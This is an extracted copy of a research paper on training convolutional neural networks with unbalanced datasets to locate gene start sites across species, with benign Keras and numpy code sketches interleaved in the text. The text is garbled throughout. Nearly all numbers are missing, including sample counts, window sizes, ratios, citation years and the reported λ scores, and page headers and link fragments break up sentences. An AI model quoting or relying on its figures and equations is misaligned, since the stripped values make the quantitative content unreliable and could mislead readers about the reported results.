provides a way to determine whether the sequence motifs recognised by chromatin-associated proteins in different species are conserved or not. subjects bioinformatics, computational biology, data mining and machine learning keywords transcription start sites, promoters, genome annotation, deep learning, dna motifs, sequence evolution, unbalanced datasets introduction the improvement of dna sequencing techniques lead to an explosion in the number and completeness of fully sequenced genomes. one of the major goals in the field is to annotate these dna sequences, which is to associate a biological function with sequence motifs located at different positions along the genome (stein, ). 
in the human genome for instance, while some dna sequences encode proteins, most sequences do not code for any protein. many of these non-coding sequences are nevertheless conserved in related species and are necessary for the correct regulation of gene expression. deciphering the function of these non-coding sequences has been increasingly achieved through improvements in how to cite this article khodabandelou g, routhier e, mozziconacci j. . genome annotation across species using deep convolu- tional neural networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ghazaleh.khodabandelou@u-pec.fr mailto:ghazaleh.khodabandeh@gmail.com mailto:julien.mozziconacci@mnhn.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. the throughput of next generation sequencing (rivera & ren, ). the . billion base pair (bp) long human genome is now annotated with many functional and bio-chemical cues (kundaje et al., ; encode project consortium et al., ), among which are the initiation sites of gene transcription (carninci et al., ; georgakilas, perdikopanis & hatzigeorgiou, ). while these annotations are becoming more numerous and precise, they cannot be determined experimentally for every organism and every cell type, as the experiments needed to produce these annotations are often costly and difficult to carry out. computational methods are therefore widely used to extract sequence information from known annotations and extrapolate the results to different genomes or conditions, e.g., kundaje et al. ( ) and durham et al. ( ). an related question is to understand the link between these annotations and the un- derlying dna sequence. to this end, supervised machine learning algorithms (goodfellow, bengio & courville, ) have been particularly successful (zou et al., ; angermueller et al., ). among those, deep convolution neural networks (cnns) are very efficient at detecting sequence features since they rely on the optimisation of convolution filters that can be directly matched to dna motifs (ching et al., ). stacking several of these convolution layers together can lead to the detection of nested motifs at larger scales. pioneering studies illustrated this ability of cnns to reliably grasp complex combinations of dna motifs and their relationship with functional regions of the genome (min et al., ; umarov & solovyev, ; alipanahi et al., ; zhou & troyanskaya, ; kelley, snoek & rinn, ; pachganov et al., ). min et al. ( ) used a cnn to predict enhancers, which are specific sequences that regulate gene expression at a distance. this method performed very well and ranked above state-of-the-art support vector machine based methods. similar tools were used in different contexts, aiming at identifying promoters (umarov & solovyev, ; pachganov et al., ) or detecting splice sites (leung et al., ; jaganathan et al., ). in these approaches, a sample set is first created by taking all positive class sequences (e.g., enhancers) and adding the same amount of randomly picked negative class examples (e.g., non- enhancers). this sample set is then divided into training, validation and test sets. balancing the data ensures that the model will be trained on the same number of positive and negative examples, thus giving the same importance to both classes. 
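a minimal sketch of the balanced set-up just described, using annotated feature positions (e.g. gene starts) as the positive class; the window length, coordinate handling and the train/validation/test split are simplified placeholders rather than the settings of any particular study.

```python
import numpy as np

def balanced_dataset(chromosome, feature_centres, win=300, seed=0):
    """Equal numbers of feature-containing and random negative windows.

    chromosome: sequence of one chromosome as a string;
    feature_centres: positions of the annotated feature (e.g. gene starts)."""
    rng = np.random.default_rng(seed)
    half = win // 2
    centres = [c for c in feature_centres if half <= c <= len(chromosome) - half]
    positives = [chromosome[c - half:c + half] for c in centres]
    negatives = []
    while len(negatives) < len(positives):
        c = int(rng.integers(half, len(chromosome) - half))
        if all(abs(c - p) > half for p in centres):   # reject windows containing a feature
            negatives.append(chromosome[c - half:c + half])
    X = positives + negatives
    y = [1] * len(positives) + [0] * len(negatives)
    return X, y

# the sample set is then split before training, e.g.:
# from sklearn.model_selection import train_test_split
# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y)
```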
while these approaches are very successful when assessed on test sets derived from the sample set, we show here that they tend to perform poorly when applied on entire chromosome sequences as required for the task of complete genome annotation. this is due to the fact that the networks are optimised on a similar number of positive and negative examples during training, but that they will usually face very different ratios of negative over positive classes when used on a full chromosome sequence (he & garcia, ). alternative approaches (alipanahi et al., ; kelley, snoek & rinn, ) used unbalanced datasets for training (i.e., with more negative than positive examples) to predict dna-binding sites for proteins and genome accessibility. in these two studies, however, the prediction performance of the model is also assessed on test sets derived from training sets, not on full genomic sequences. the task of genome-wide prediction has been assessed in a more recent study aiming at identifying cell type specific regulatory khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. elements (kelley et al., ). in order to infer long range relationships between these elements, kelley et al. used very long ( kb) non-overlapping windows covering the whole genome. this approach has proven efficient but requires a lot of computational memory. as our goal is to provide genome-wide predictions, the methodology we used is inspired from this last study. since we do not aim here at predicting cell type specific features, we could use shorter sequences as input and a simpler network architecture. we also present two novelties for the development and for performance assessment of genome-wide predictions. firstly, we do not use as a quality measure the classical prediction scores computed on test sets obtained by dividing the sample data into training, validation and test sets as commonly done in machine learning. rather, we compute prediction scores that assess the ability of our model to annotate a full chromosome sequence by designing a specific metric (described in material and methods). secondly, we change the ratio between positive and negative examples in order to obtain the highest prediction scores and show that this tuning is has an important effect on the outcome. as a proof of principle, we use in this work gene start sites (gss) as features. dna motifs around gss are recognised by the transcription machinery and indicate the location of the initiation of transcription (kugel & goodrich, ). the dna sequence surrounding gss therefore contains the information that could in principle be used by an algorithm to identify in silico the gss locations. these dna sequence motifs are different for different classes to genes. for instance, protein coding genes can have either cg di-nucleotide (cpg) rich or poor sequences upstream their gss (deaton & bird, ). we show that using training sets with a higher ratio of negative over positive examples, we can faithfully retrieve gss positions, with performances varying for different classes of genes such as coding or non coding genes. we then propose a new application of cnns in genomics that leverages the fact that similar organisms tend to have similar regulatory mechanisms, i.e., rely on homologous molecular machinery and on homologous dna regulatory motifs. 
exploiting these homologies, we first train a model on a dataset corresponding to a given organism and use it to predict the annotation on the genome of a related organism, opening new opportunities for the task of de-novo genome annotation. we show that a cnn trained on gss containing regions in human is able to recover regions containing gss in the mouse genome and vice versa. we also assess the generalisation of the approach to more distant species, taking as examples gallus gallus and danio rerio. methods input generation genomic sequences were downloaded for the reference genomes for human (hg ), mouse (mm ), chicken (gg ) and zebrafish (dr ) via the urls shown in table . similarly, gss positions for each genome were extracted from their respective ncbi refseq reference gene annotations (refgene). as a positive input class, we use regions of bp flanking gss (i.e., ± bp around the gss) which are supposed to contain multiple sequence signals indicating the presence khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table url of the data used in the present work. genomes human https://hgdownload.soe.ucsc.edu/goldenpath/hg /bigzips/hg .fa.gz mouse https://hgdownload.soe.ucsc.edu/goldenpath/mm /bigzips/chromfa.tar.gz chicken https://hgdownload.soe.ucsc.edu/goldenpath/galgal /bigzips/galgal .fa.gz zebrafish https://egg.wustl.edu/d/danrer /refgene.gz reference gene human https://egg.wustl.edu/d/hg /refgene.gz mouse https://egg.wustl.edu/d/mm /refgene.gz chicken https://egg.wustl.edu/d/galgal /refgene.gz zebrafish https://egg.wustl.edu/d/danrer /refgene.gz of a gss to the transcription machinery of the cell. for instance in the human genome, , gss positions are extracted on both dna strands ( , for the positive strand and , for the negative strand). in order to generate the negative class, we select , ×q sequences of bp at random positions on a random strand, rejecting regions that do contain a gss. the odds of getting at random a genomic region containing a gss are close to . %. for q= , there is an equal number of negative and positive class examples. unbalanced datasets are produced using different values of q ranging from to . for q= , the negative class encompasses × × k≈ gb, which represents one third of the human genome. for the other genomes a similar procedure was implemented. the total number of gss used was , for the mouse, for the chicken and for the zebrafish. convolution neural network (cnn) a cnn (see fig. ) is trained in order to predict the presence of a gss in a dna sequence of size bp. the shape of the input layer is c×b in which c = is the number of different nucleotides and b= is the length of the input sequence. the nucleotide sequences are one hot encoded so that a=( , , , ), t=( , , , ), c=( , , , ), and g=( , , , ). the training set contains n samples of labelled pairs (x(n),y(n)), for n∈{ ,...,n}, where x(n) are matrices of size c×b and y(n) ∈{ , }. each x(n) is associated with y(n) = when it corresponds to a region containing a gss and y(n) = otherwise. the first convolution layer consists of k kernels of length s which are applied on b−s+ successive sequences at positions p∈{ ,...,(b−s+ )} to recognise relevant dna motifs of size s. this operation generates an output feature map of size k×(b−s+ ) for an input x(n) of size c×b. 
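before completing the description of the convolution layer, the encoding and sampling steps just described can be sketched in a few lines. a minimal sketch: the assignment of bases to rows is an assumption (the exact unit vectors are elided above), and unknown bases are zero-filled here.

```python
import numpy as np

BASE_ROW = {"a": 0, "t": 1, "c": 2, "g": 3}   # assumed row order

def one_hot(seq):
    """Encode a DNA string as a (4, len(seq)) matrix; a/t/c/g map to unit
    vectors and any other character (e.g. n) becomes an all-zero column."""
    mat = np.zeros((4, len(seq)), dtype=np.float32)
    for j, base in enumerate(seq.lower()):
        row = BASE_ROW.get(base)
        if row is not None:
            mat[row, j] = 1.0
    return mat

def limited_unbalanced_set(gss_seqs, non_gss_pool, q, seed=0):
    """All positive windows plus q times as many randomly chosen negatives."""
    rng = np.random.default_rng(seed)
    idx = rng.choice(len(non_gss_pool), size=q * len(gss_seqs), replace=False)
    negatives = [non_gss_pool[i] for i in idx]
    X = np.stack([one_hot(s) for s in list(gss_seqs) + negatives])
    y = np.array([1] * len(gss_seqs) + [0] * len(negatives))
    return X, y
```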
the feature map m resulting from the convolution operation is computed as

m_{p,i} = \sum_{j=1}^{c} \sum_{r=1}^{s} w_{i,j,r} \, x_{p+r-1,\,j} + b_i, \quad i \in \{1, \dots, k\},

where w denotes the network weights of size (k × c × s) and b denotes the biases of size (k × 1) (see e.g., goodfellow, bengio & courville, ). after the convolution layer a non-linear function is applied to the output, here a rectified linear unit (relu). this activation function computes f_relu(m) = max(0, m) to incorporate non-linearity by transforming all negative values to zero. in order to reduce the input dimension we apply a max-pooling process with a pool size m over the output of f_relu(m). similar convolution layers followed by relu and max-pooling are added sequentially on top of the first layer to grasp higher-order motifs. the output of the last max-pooling layer is then fed into a fully connected layer, whose output x is transformed by a softmax layer, i.e., a sigmoid function φ(x) = 1/(1 + e^{-x}), in order to give the final output of the cnn. this final score of the input sequence is ideally 0 for non-gss and 1 for gss-containing sequences. when we need to perform a classification we use a threshold of 0.5 to discriminate between the two classes.

[figure : overview of the cnn model. a total of bp-long sequences were one hot encoded into a × input matrix. the first cnn layer performs a convolution on each input matrix to recognise relevant motifs. the next convolutional layers model the interplay among these motifs to grasp higher-level features. max-pooling layers reduce the dimensions of the layers. the model is trained to correctly label input sequences as gss or non-gss. the output layer of the trained network then gives a probability for any bp region to contain a gss. it can be applied along a full chromosome, i.e., on all bp-long sequences with a bp shift.]

in the training phase, the weights and biases of the convolution layers and the fully connected layer are updated via back-propagation (rumelhart, hinton & williams, ) in a way which decreases the loss, which measures the discrepancy between the network predictions and the reality, averaged over individual examples. we use here the binary cross-entropy, computed as

L = -\frac{1}{N} \sum_{n=1}^{N} \left[ y^{(n)} \log \hat{y}^{(n)} + (1 - y^{(n)}) \log (1 - \hat{y}^{(n)}) \right],

where \hat{y}^{(n)} is the estimated score for the input sample x^{(n)}. as the data are imbalanced for q > 1, the model may reach a local optimum by predicting the non-gss class for all input sequences. to deal with this issue, we attribute different weights to the positive and negative classes: we assign a greater importance to the less represented gss class by multiplying the associated term in the loss by a weight c_w = (number of non-gss) / (number of gss) = q. one of the important issues of any learning algorithm is overfitting.
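before turning to overfitting and the remaining implementation details, the architecture and weighted loss described above can be written compactly in keras. a minimal sketch: the number of filters, kernel sizes, pooling widths and the dense layer size are placeholders (the tuned values are given in the table below and in the supplementary materials), and only the class weighting c_w = q is taken directly from the text.

```python
import tensorflow as tf
from tensorflow.keras import layers, models

def build_gss_cnn(seq_len=299, filters=64, kernel=16, pool=2, drop=0.2):
    """Stacked convolution -> ReLU -> max-pooling -> dropout blocks, a dense
    layer and a sigmoid output, trained with binary cross-entropy.
    All layer sizes here are placeholders, not the paper's tuned values."""
    model = models.Sequential([
        layers.Input(shape=(seq_len, 4)),        # one-hot windows, channels last
        layers.Conv1D(filters, kernel, activation="relu"),
        layers.MaxPooling1D(pool),
        layers.Dropout(drop),
        layers.Conv1D(filters, kernel, activation="relu"),
        layers.MaxPooling1D(pool),
        layers.Dropout(drop),
        layers.Flatten(),
        layers.Dense(128, activation="relu"),
        layers.Dropout(drop),
        layers.Dense(1, activation="sigmoid"),
    ])
    model.compile(optimizer="adam", loss="binary_crossentropy",
                  metrics=["accuracy"])
    return model

# training with the class weighting c_w = q for a limited unbalanced set
# (inputs are the one-hot matrices from the previous sketch, transposed to
#  shape (n, seq_len, 4)):
# model = build_gss_cnn()
# model.fit(X.transpose(0, 2, 1), y, epochs=100, validation_split=0.1,
#           class_weight={0: 1.0, 1: float(q)},
#           callbacks=[tf.keras.callbacks.EarlyStopping(patience=5)])
```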
overfitting occurs when one achieves a good fit of the model on the training and validation data, while it does not generalise well on new, unseen data. to deal with this issue, a regularisation procedure called dropout is usually used (srivastava et al., ). in the training step, some outputs of the pooling layers are randomly masked while the remaining information is fed as input to the next layer.

implementation. we implement the cnn using the keras library (chollet et al., ) with tensorflow (abadi, agarwal & barham, ) as back-end. training on a gpu is typically faster than on a cpu; we use here a gtx ti gpu. we use adaptive moment estimation (adam) to compute adaptive learning rates for each parameter (kingma & ba, ). the adam optimiser is an algorithm for first-order stochastic gradient-based optimisation of functions, based on adaptive estimates of lower-order moments. the network architecture (see fig. ) is detailed in table . the models are trained for epochs and mostly converge rapidly (around – epochs; we use early stopping to prevent overfitting). hyper-parameter tuning is detailed in the supplementary materials. source code is available at https://github.com/studytss/deeptss/.

genome wide performance measure. different measures have been developed to assess the performance of models on conventional test sets, i.e., test sets derived from a subset of the initial data. such measures are described in detail in the corresponding supplementary materials section. in our case, we want to apply our model on all the bp windows spanning a full chromosome and eventually on chromosomes from other species. specifically, the model was tested on chromosome , which was withdrawn from the training set. we therefore developed a measure to evaluate the performance of the trained models in this setting. this metric, called λ, measures the enhancement of the predicted signal specifically in the regions surrounding the known gss. we use in the present paper regions of length r = bp. to compute λ, we first compute the genome-wide z-score (kreyszig, ) z_g = (y_g − µ̄) / σ from the predictions y_g, where g denotes positions on the genome, and µ̄ and σ stand for the prediction mean and standard deviation, respectively. we extract z_gss, the z_g signal over kb windows centred on each gss of the test region, e.g., a full chromosome. z_gss is a 2d array whose rows correspond to different genes and columns to different distances to the gss. we then average z_gss element-wise over all gss, i.e., along all rows. this gives us s, the average of the z-transformed prediction score in a kb window around all gss. in order to measure the signal increase close to the gss, which we call λ, we compute the average of the curve s on a region of r bp centred on the gss. a higher value of λ corresponds to a higher signal-to-noise ratio around the gss.
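the λ score defined above amounts to a z-normalisation followed by two averages. a minimal numpy sketch, assuming the genome-wide prediction scores are already available as one value per position; the flank and r defaults are illustrative, not the elided values used in the paper.

```python
import numpy as np

def lambda_score(pred, gss_positions, flank=1000, r=600):
    """Average z-scored prediction in a central window of width r around
    annotated gene starts, i.e. the signal-to-noise measure described above.

    pred: 1-D array of prediction scores along the test chromosome;
    gss_positions: positions of the annotated gene starts on that chromosome."""
    z = (pred - pred.mean()) / pred.std()                      # genome-wide z-score
    rows = [z[p - flank:p + flank] for p in gss_positions
            if flank <= p <= len(z) - flank]                   # one row per gene
    s = np.mean(rows, axis=0)                                  # average profile around gss
    centre = len(s) // 2
    return float(s[centre - r // 2: centre + r // 2].mean())
```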
layer name layer shape output shape input – × × conv d × ×( × ) × × max-pooling × × × dropout – × × conv d × ×( × ) × × max-pooling × × × dropout – × × conv d × ×( × ) × × max-pooling × × × dropout – × × dense dropout – dense (sigmoid) results training models for genome annotation of gss the problem of detecting human gss using deep neural networks has been tackled in (umarov & solovyev, ). we first follow a similar approach and use a balanced dataset (see methods for details). the model is trained/validated on an equal number of bp long positive and negative examples and is evaluated on a test set composed of % of the original data that was left aside prior to training. the specificity (sp), the sensitivity (sn) and the matthews correlation coefficient (mcc, chicco & jurman, ) (see supplemental information for definition) were found to be similar to the ones found in (umarov & solovyev, ) which used a similar approach albeit separating the sample data into tata-containing gss and non-tata gss (sp = . , sn = . and mcc = . ). in order to assess how this model would perform as a practical tool for detecting gss on a genome-wide scale, we apply it on all the sequences along chromosome (which has been withdrawn from the training phase, i.e., from the training and validation sets) obtained using a bp long window sliding with an offset of bp. figure a illustrates the predictions of the cnn model over a typical region of kbp containing out of the gss of chromosome . although the predictions yield higher scores over gss positions, they also yield high scores over many non-gss positions reflecting a low signal-to-noise ratio. this is due to the fact that the reality is biased in the training phase during which the cnn model learns an equal number of examples from the positive and the negative classes (he & garcia, ). applied over all the -bp sequences of chromosome , the model encounters many more examples of the negative class and fails to generalise to the new examples. khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure cnn predictions for two regions of chromosome . (a) prediction scores for balanced * model (q = ) and unbalanced * model (q = ), respectively in blue and red on a kb region. the position of genes is indicated below. the annotation track was done using the uwash epigenome browser (https://epigenomegateway.wustl.edu/). both models detect gss positions, but the * model re- turns a higher background signal at non gss positions. adding negative examples using the * model mitigates the noise while preserving the high scores over gss. (b) application of * models, trained on different datasets, over a . kb region of chromosome . at each site, the maximum and minimum pre- diction scores are respectively displayed in black and red. other prediction scores are plotted in grey. full-size doi: . /peerjcs. /fig- to address this issue and train a network for genome annotation, we propose a heuristic where more negative examples are added into the balanced dataset to reduce the importance of the positive class during training and to allocate more weight to the negative class. we call these augmented datasets limited unbalanced datasets. the parameter q is the ratio between negative and positive training examples and denote as q∗ models trained with the corresponding ratio. for instance, on fig. 
a the model trained on the balanced data yielding to blue signal predictions is denoted as ∗. we train our cnn model on a * dataset (q= ) and assess the efficiency of the trained model. as depicted on fig. a by a red signal, the predictions for this model display a much higher signal-to-noise ratio, with significant peaks over each of the gss (c orf , ifnar , il rb, ifnar , ifngr , tmem b, dnajc ) and a much weaker signal between these sites. predicting gss using the * model is thus expected to generate fewer false positives than the * model, regardless the value of the threshold used to identify gss-containing regions. in order to khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://epigenomegateway.wustl.edu/ https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. assess how changing the value of q affects gss classification, we apply a threshold on the prediction and compute the precision and the recall obtained for both models (i.e., * and *) at bp resolution on a full chromosome. the precision recall curves confirmed the compromising effect of a lower signal-to-noise ratio on the accuracy of the classification (fig. s ). for the sake of completeness, the performance of more models ( *, *, *, *, *, *) evaluated using conventional metrics on test sets derived from the initial sample sets can be found in supplemental information . investigating the effect of random selection of the negative examples on predictions while positive examples are always the same in different sample sets, the negative examples are randomly picked out of the genome. the performance of the model in different regions of chromosome can thus vary for different training sets (wesolowska-andersen et al., ). to investigate this variation, we set up balanced ∗ datasets and train cnns separately. the models are then applied over human chromosome to study the fluctuations of the predictions. the variation of predictions is depicted in fig. b. the first observation is that almost all predictions present a peak over the dip a gss. however, the large gap between the minimum and maximum predictions underlines the variability of predictions obtained with different training datasets. this variability illustrates the uncertainty of the predictions obtained from a single cnn trained on a balanced dataset and highlights the need to use limited unbalanced datasets for the task of genome annotation. comparing * and * models over a full chromosome models trained on * and * sets are applied to the full chromosome and the z-normalized prediction scores around gss are presented as heat-maps. while the * model (fig. a) presents a noisy signal around gss positions, the * model (fig. b) presents a higher signal-to-noise ratio. to investigate the performance of different models on a genome-wide scale we devised a custom metric λ which measures the average signal-to-noise ratio around gss (see methods for the definition of λ). figures c, d illustrate the average of the z-score over all the gss of chromosome for the models * and *, respectively, and λ denotes the average of this average over a r = bp region centred on the gss. a larger λ score corresponds to a higher signal-to-noise ratio. in this particular case, we find a λ score of . and . for the * and * model, respectively. to illustrate the variability of prediction scores achieved around different gss, we randomly selected four gss within the chromosome. the first gss corresponds to the gene cxadr, shown in fig. e. 
while the prediction of * model results in a low averaged z-scores over all positions, the averaged z-score of * model strongly peaks around the gss position and shows low variations over non-gss positions. figure f depicts the second selected gss corresponding to the krtap - gene. this gene is part of a cluster of similar genes belonging to the family of keratin associated proteins (highlighted by a yellow rectangle on figs. a, b). for this particular cluster, the predictions are poor for khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure comparison of the * and * models predictions over chromosome . (a) and (b) heat maps depict the z-score of the prediction for the * and * models respectively on , bp flanking each gss of chromosome . (c) and (d) averaged z-score of the predictions over each gss of chromo- some . (e–h) zoom on regions around randomly selected gss. genes are indicated at the bottom of each plot. (i–k) averaged z-score of the predictions over each gss of mouse chromosome x (i) and for networks trained on mouse/human chromosomes (except x) and applied on human/mouse chromosome x (j,k). full-size doi: . /peerjcs. /fig- both * and *, probably reflecting a specific gss signature that has not been grasped by the model. another example of gene cluster with a poor prediction score for gss is the t-rna cluster, highlighted in green in figs. a, b. figures g, h displays the predictions around the gss of the scaf and, pcnt and c orf genes, respectively. on these more typical gss the * model shows a higher signal-to-noise ratio than the * and regions containing gss are detected. these regions often stretch over kb while our training sequence centred on each gss is only bp long. this could indicate the presence either of alternative gss close to the annotated gss or of similar sequence patterns in broader regions surrounding the gss (carninci et al., ; sandelin et al., ). learning and predicting in human and mouse to show the potential of our annotation method in a different context, we replicate a similar gss analysis in mouse. models with values of q ranging from to trained on mouse chromosomes (except x) are applied over the mouse chromosome x to assess the model performance (see fig. i, and figs. s a, s d, s g). the averaged z-score of λ reaches values of . and . respectively for the * and * models in quantitative agreement with the model performance in human. khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. mammals show a substantial degree of homology in the dna sequence found at gss (waterston et al., ), and earlier computational models were trained to recognise transcription start site in any mammalian species (down & hubbard, ). this study focused on sequences, of which were kept aside for test purposes and we want here to extend the validity of this initial study at the genome wide level. following this line, we determine the possibility of predicting gss in one organism with a network trained on a related organisms. 
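in code, cross-species annotation is simply the application of a network trained on one genome to sliding windows from another. a minimal sketch reusing the one_hot and lambda_score helpers sketched earlier; the file name, window length and stride are placeholders.

```python
import numpy as np
import tensorflow as tf

def sliding_predictions(model, chromosome, win=299, stride=1, batch=4096):
    """Prediction score for every window of length `win` along a chromosome."""
    scores, buf = [], []
    for start in range(0, len(chromosome) - win + 1, stride):
        buf.append(one_hot(chromosome[start:start + win]).T)   # channels last
        if len(buf) == batch:
            scores.append(model.predict(np.stack(buf), verbose=0).ravel())
            buf = []
    if buf:
        scores.append(model.predict(np.stack(buf), verbose=0).ravel())
    return np.concatenate(scores)

# e.g. a network trained on mouse applied to the human X chromosome:
# mouse_model = tf.keras.models.load_model("mouse_gss_cnn.h5")   # placeholder path
# pred = sliding_predictions(mouse_model, human_chr_x_sequence)
# print(lambda_score(pred, human_chr_x_gss_positions))
```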
this possibility has previously been shown to be effective for sequence variants calling (poplin et al., ) to this end, the mouse trained model is applied on human chromosome x and the human trained model is applied on mouse chromosome x. the two chromosomes carry homologous genes (waterston et al., ), the number of annotated gss varies with a total of , gss in human and , gss in mouse. while the model trained and applied on mouse shows a better signal-to-noise ratio, the same model applied to human chromosome x still captures most of the gss and gives a λ score of . for the * model (see fig. j and figs. s b, s e, s h). similarly, the models trained on human capture most of gss on the mouse x chromosome as shown in fig. k and figs. s c, s f, s i and reaches a λ score of . for the * model. in all cases, the signal-to-noise ratio is improved in the * models with respect to the * models. the human model applied on human provides the highest scores for both * and * models probably a signature of an overall better gss annotation. evaluation of the prediction for different gss classes the potential of our trained networks to recover gss containing regions along the human and mouse genomes is assessed in the previous parts without any distinction between different gss classes. since we find that some gss are better predicted than others (fig. ), we compute the λ score independently for the two main classes of gss: mrna-gss and ncrna-gss. while λ is higher for the mrna-gss class, the model is versatile and is also able to predict the ncrna-gss (fig. b). in human and mouse, mrna-gss are found in different classes, that can be derived from the cpg content of the region flanking the gss. high cpg regions, also called ‘‘cpg island’’ can be methylated and play an important role in gene regulation (deaton & bird, ). figure a displays the distribution of the cpg number in bp regions surrounding the all mrna-gss for the mouse and human x chromosome. from this distribution, we identify three classes of mrna-gss with respectively a high, medium and low cpg content. high cpg gss correspond to genes regulated by dna methylation and have been shown to exhibit a different pattern of chromatin modifications (vavouri & lehner, ). assessing the performance of the model for the three different classes, we find that better scores are obtained for cpg richer gss (fig. b). the worst performing gss are low cpg content gss which are hardly recovered by our model. in order to test whether cpg content alone could be used to predict gss we computed the λ score over all gss using the z-normalized cpg content as predictor. we get values of . and . respectively for the human and mouse gss indicating that the cpg content is a strong indicator of the present of gss but that our models use as well other features which allow them to reach much higher scores. khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure evaluation of the model performance for different classes of genes. (a) and (b) cpg number in bp regions centred on mrna-gss in x chromosomes for human (a) and mouse (b). 
these regions were divided in three groups of similar size according to their cpg number into low, medium and high groups (the bounds are % and % for human and % and % for mouse). the proportion of genes in each class is similar on the x chromosome (test set) than on other chromosomes (training and valida- tion sets). (c) lambda values computed for networks trained on each species non-x chromosome gss (t) and predicted on either species’ x-chromosome gss (p). lambda values for each mrna-cpg sub-group and ncrna genes are also shown to highlight different levels of performance. full-size doi: . /peerjcs. /fig- application of the approach to other vertebrates the performance of a cnn trained on human gss to recover mouse gss is not surprising given the similarity between their genomes (waterston et al., ). we next set out to apply the same methodology on more diverse species, including chicken and zebrafish (fig. ). four cnns were trained on all the gss from the genomes of homo sapiens (human), mouse musculus (mouse), gallus gallus (chicken) and danio rerio (zebrafish). g.g. and d.r. are model organisms, and together with h.s. and m.m. provide the most comprehensive gss annotations for mammals, birds and fishes. these four cnns were khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure lambda scores obtained with cnn trained on four different species: human, mouse, chicken and zebrafish. lambda scores are computed from predictions done on gss of (a) human, (b) mouse, (c) chicken and (d) zebrafish chromosomes. full-size doi: . /peerjcs. /fig- then applied genome wide on each of the four species and the λ metric is computed for each chromosome independently, using a r value of bp (see methods). the results for the human and mouse genomes are very similar, with only a slightly better performance when the model trained on a species is applied on the same species. the model trained on the chicken genome performs less well when applied on the mammalian genomes and the model trained on the zebrafish genome is not able recover the mammalian gss as shown by a λ value of . when applied on the chicken genome, the mouse and human models surprisingly outperform the chicken model, probably because the gss annotation is better in the two mammals so that the training phase is more efficient. this result highlights the potential of the method when used across different species when the genome of one species is more precisely annotated. when applied on the zebrafish genome on the other hand, the human, mouse and chicken models all show poor performances while the zebrafish model performs well. this is in line with the fact that the cpg composition of zebrafish regions around gss if very different than in chicken and mammals. cpg islands, which are high density cpg regions, are found upstream of many gss for coding genes in chicken and mammals while they are less abundant in the zebrafish’s genome which has a low gc content (han et al., ). all together, these results suggest that the molecular machinery that interprets the genome sequence in order to find start sites of genes has a similar specificity in human, mouse and chicken, but a different specificity in zebrafish. conclusions with the surge of dna sequencing technologies, over a million genome datasets are now available and petabases of transcripts are sequenced every year to annotate these datasets with functional marks (wainberg et al., ). 
it has not escaped the notice of many computational biologists that deep neural networks are a key tool to deal with this exponentially increasing amount of data (wainberg et al., ). one possible application is to leverage datasets with good annotations in order to train neural networks and to predict annotations on other datasets. one of the practical issues when applying neural networks khodabandelou et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. on genomic sequences is unbalanced data, a well-known issue in the machine learning literature (he & garcia, ; chawla, japkowicz & kotcz, ; batista, prati & monard, ). in the present paper, we address this problem using gss as a case study. indeed, gss occupy only a few locations on the genome ( , gss for human) leading to extreme unbalances in datasets (i.e., the ratio of gss-containing bp windows to non-gss in the human genome is / ). in this case, the lack of examples of the minority class (i.e., true gss) impacts the learning process as conventional machine learning algorithms usually measure the model performance on the majority class (i.e., non-gss) leading to biased or inaccurate prediction of the minority class. to deal with this disparity, we adopt a weighting strategy to decrease the importance of the majority class samples (non-gss) during the learning process thereby improving identification of the rare minority class samples (gss). using this approach, which we call ‘‘limited unbalanced datasets’’, we show that learning on imbalanced datasets can be performed effectively, and that for gss recognition, a ratio of to positive over negative examples is usually sufficient to achieve a good signal to noise ratio in the prediction. this approach can be easily extended to identify other functional regions in any annotated genome. we also show that our method can be efficiently used across genomes of different species, i.e., training the model on one genome and applying it to another genome. we use the x chromosomes of human and mouse gss as a case study, and apply models trained on each one’s other chromosomes to its own and the other one’s x chromosome. while the sequence of this chromosome has evolved differently in both species, many genes are homologous (sinha & meller, ). the fact that we are able to recover gss in mouse/human with a model trained on the other organism suggests that the machinery capable of recognising gss in each organism is overall conserved. we also show that this methodology can be applied to more distant species, and use as examples chicken and zebrafish. our results point toward a higher similarity between mammal and chicken while zebrafish gss cannot cannot be reliably predicted with models trained on mammal and chicken sequences. while the genome sequence conservation can be computed directly from dna sequences, further developments of our method may provide a new tool to quantify more complex patterns of similarity between different organism’s nuclear machinery that interprets dna sequences in vivo. acknowledgements we would like to thank léopold carron for helping us with datasets, hugues roest croeluis for discussions, michel quaggetto for technical support and annick lesne for comments on the manuscript. we also wish to thank our editor james procter and the two anonymous referees for their invaluable work. khodabandelou et al. ( ), peerj comput. sci., doi . 